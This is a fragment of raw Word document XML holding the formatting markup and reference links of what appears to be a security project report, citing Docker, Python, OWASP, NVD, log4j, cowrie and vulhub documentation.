        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.docker.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ECA113" w14:textId="77777777" w:rsidR="0059754E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Python Official Documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.python.org/3/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043BBFC1" w14:textId="49C65661" w:rsidR="008C6073" w:rsidRPr="009029E0" w:rsidRDefault="0059754E" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top Ten: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="008C6073" w:rsidRPr="009029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43EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55202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18D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EA6F298"/>
    <w:lvl w:ilvl="0" w:tplc="35DA48FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="54860F30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="09241694">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="97B8075E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0E260676">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="24541ABA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9C4E083A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D790692E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9A5063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AA6B35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DD24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4504238">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="743454658">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="58079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73"/>
    <w:rsid w:val="00190788"/>
    <w:rsid w:val="0037016F"/>
    <w:rsid w:val="00450608"/>
    <w:rsid w:val="0059754E"/>
    <w:rsid w:val="005A0CD5"/>
    <w:rsid w:val="008C6073"/>
    <w:rsid w:val="009029E0"/>
    <w:rsid w:val="00C7525D"/>
    <w:rsid w:val="00CC6197"/>
    <w:rsid w:val="00FA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D5EE"/>
  <w15:docId w15:val="{C455D4F6-0CCB-4FA6-A718-DB05C65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7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lhub/vulhub" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.dock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owrie.org" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.splunk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cowrie/cowrie" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon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owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-442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ging.apache.org/log4j/2.x/security.html" TargetMode="External"/><Relationship Id="rId14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2635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Likhitha Panneeru</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2026-08-08T17:14:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-08T16:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-08T17:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>